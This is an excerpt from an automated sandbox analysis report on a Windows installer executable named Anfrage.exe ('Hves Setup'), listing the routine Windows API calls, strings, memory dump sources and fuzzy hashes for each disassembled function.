                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Tahoma
                                                                          • API String ID: 3808545654-3580928618
                                                                          • Opcode ID: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
                                                                          • Instruction ID: 1358c95a7d37f972e16a3fa2afb190f01721c65bbfaef5fc63903db35bf40af4
                                                                          • Opcode Fuzzy Hash: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
                                                                          • Instruction Fuzzy Hash: DD015272544240AFE7006B74AE4A7A93FF8DB59315F10843AF141B62F2CB7900458FAD
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                          • MulDiv.KERNEL32(0012F3E6,00000064,001318C0), ref: 00402C59
                                                                          • wsprintfA.USER32 ref: 00402C69
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402C63
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
                                                                          • Instruction ID: 7317fb9631212961ca73b33fff5b89fd9836da26efc2a3b2e30b0290716cf4a9
                                                                          • Opcode Fuzzy Hash: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
                                                                          • Instruction Fuzzy Hash: 0E01627060020CFBEF209F60DE09EEE37A9EB04304F008039FA06A51D0DBB899518F58
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                          • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                          • String ID:
                                                                          • API String ID: 2667972263-0
                                                                          • Opcode ID: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
                                                                          • Instruction ID: 571a6d001cc63de597daa7fe39824babb5321d0f4a9ee8e37ed24c69abe451e8
                                                                          • Opcode Fuzzy Hash: 45c976d1f9efa3b673be8bfb29733d3aa1598ede0f13eddfd8cf1085deaf7a0d
                                                                          • Instruction Fuzzy Hash: 62219C71800128BBCF217FA5CE89D9E7A79EF09324F14423AF551762E1CA794941DFA8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGlobal
                                                                          • String ID:
                                                                          • API String ID: 2979337801-0
                                                                          • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                          • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                          • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                          • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                          APIs
                                                                          • GetDlgItem.USER32(?), ref: 00401D3F
                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                          • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
                                                                          • Instruction ID: 59b50efb9a894631b7e7ef6fc31e4c4877b28631b56f020e773a3ce1da8bb2e7
                                                                          • Opcode Fuzzy Hash: b9866fc206b3e1f2001e4087a8a8d6ef2e3fb8e7fd47bad3a68fd0200ce6cc51
                                                                          • Instruction Fuzzy Hash: 6EF0FFB2600519BFD700EBA4DF88DAFB7BCEB44301B10447AF641F2191CA749D018B38
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
                                                                          • Instruction ID: c229e225b91697c78ff11bbf30ef832f008d48f992f947ceaaf7a44b37239d7f
                                                                          • Opcode Fuzzy Hash: 028af5dbbf2e27154293e1be7a1693a126019fa8c38554a83be992bc88fc6b23
                                                                          • Instruction Fuzzy Hash: E921A271A44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A868,0042A868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046B8,000000DF,00000000,00000400,?), ref: 0040483B
                                                                          • wsprintfA.USER32 ref: 00404843
                                                                          • SetDlgItemTextA.USER32(?,0042A868), ref: 00404856
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
                                                                          • Instruction ID: 1726a7b3b84a2b44988fbd512cc110d638b221a6b4b1acd42f263589eafed974
                                                                          • Opcode Fuzzy Hash: 87a759055d291fd877383144180c8e5bed6145313cb5bdff1d542eccde70147e
                                                                          • Instruction Fuzzy Hash: D611E4736041282BEB00666D9C45EEF3698DB86374F244237FA25F31D1EA78CC1286E8
                                                                          APIs
                                                                          • SetWindowTextA.USER32(00000000,Hves Setup), ref: 00403AA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$1033$Hves Setup
                                                                          • API String ID: 530164218-2606437607
                                                                          • Opcode ID: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
                                                                          • Instruction ID: b04f25c42bae21d45f40ba66b929719106617fb277c5c9e4054ff8f425243e64
                                                                          • Opcode Fuzzy Hash: 96401226afcf46c978deea678981fff0f7e57d07aa73fd903f01d42c88786375
                                                                          • Instruction Fuzzy Hash: 1811A431B005109BC720EF55DC8097777ACEF94759758813BE841A7391D6399D038E68
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 0040583B
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403190,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00405844
                                                                          • lstrcatA.KERNEL32(?,0040A014), ref: 00405855
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405835
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-4083868402
                                                                          • Opcode ID: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
                                                                          • Instruction ID: 43d0cd13a6a684b33c4c302d476afec45ae212270d2ea225269fd4ac386bbf9e
                                                                          • Opcode Fuzzy Hash: 178b6ada5e076015f485ca613ecf1787b7cf1381da79526f7687ddfe4de49248
                                                                          • Instruction Fuzzy Hash: 46D0A9A2201A302AE20237158C09ECB2A08CF12316B04803BF202B21A1CA7D0D428BFE
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00665A78), ref: 00401BCC
                                                                          • GlobalAlloc.KERNEL32(00000040,00000404), ref: 00401BDE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID: Call$xZf
                                                                          • API String ID: 3394109436-1563588713
                                                                          • Opcode ID: 382e83497b6452e7c65802fe1326a2029af183ce9cf88f464a37c6325ccb903e
                                                                          • Instruction ID: d054425cb323db0c5527465b0d1f96526ab7a24d54a529c5f55500c1511f63c4
                                                                          • Opcode Fuzzy Hash: 382e83497b6452e7c65802fe1326a2029af183ce9cf88f464a37c6325ccb903e
                                                                          • Instruction Fuzzy Hash: AB2184726002159BD710ABA49E88E5E77E9DB44314B28883BF241B33D1D77999018F6D
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                          • GetTickCount.KERNEL32 ref: 00402CC7
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
                                                                          • Instruction ID: 83d2969b76bdb5b590415ddeb9dbf6a67b394939c3bc7fdf3e8ca1fe09a6ce6e
                                                                          • Opcode Fuzzy Hash: 7c95322a2218cd30271dcbbb025a48105d342dcc5512f67fa7608e428122dd6b
                                                                          • Instruction Fuzzy Hash: 4CF05E31605620ABD6217B20FF0C99F7BA4B714B45B81057EF045B21F8CB7818868B9C
                                                                          APIs
                                                                            • Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Hves Setup,NSIS Error), ref: 00405DD0
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(?,?,0042BC70,?,0040593A,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DC
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058E1
                                                                            • Part of subcall function 004058CE: CharNextA.USER32(00000000), ref: 004058F5
                                                                          • lstrlenA.KERNEL32(0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405976
                                                                          • GetFileAttributesA.KERNEL32(0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,0042BC70,00000000,0042BC70,0042BC70,75573410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 00405986
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405923
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3248276644-4083868402
                                                                          • Opcode ID: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
                                                                          • Instruction ID: 92543aceb9d73041788eed49261eabef0250a74612a1112b20cd45f7194ba1aa
                                                                          • Opcode Fuzzy Hash: 2dd11022cd3804a0f23826d58d53fd3ba18c85e64f763ac6aee612c12e1a2a27
                                                                          • Instruction Fuzzy Hash: 2FF0F466104E51A2C222333A1C09E9F0A18CE43374719453FFCA1B62C2DB3C8D569DBE
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,00403686,004034A0,?), ref: 004036C8
                                                                          • GlobalFree.KERNEL32(0065B5C0), ref: 004036CF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004036AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-4083868402
                                                                          • Opcode ID: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
                                                                          • Instruction ID: 9fca1652fb000c4b705c35b2fab9dc87deb0b29542395ee28e6d3d9d92831ef3
                                                                          • Opcode Fuzzy Hash: 1bad914f96c97a74accc372815b9fc60e9a0461e25a509c21ecbd9517d8462b1
                                                                          • Instruction Fuzzy Hash: B8E08C32A2102067CA312F54EE0472A7BAC6F49B22F09046AE9807B3608B755C424BCC
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405882
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage.exe,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405890
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-1876063424
                                                                          • Opcode ID: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
                                                                          • Instruction ID: 2ed5ef101b5713daa1f548366255804a524b1aabb415f21906ff2d2d9e5555c3
                                                                          • Opcode Fuzzy Hash: a9e0b15de56eef468385f8c6f647f59dc691c576a1137d19596c50b040f8bf1b
                                                                          • Instruction Fuzzy Hash: C3D0A763408D701EF30363108C04B9F7A48DF12300F0940B2E481A2190C6BC0C424BBD
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
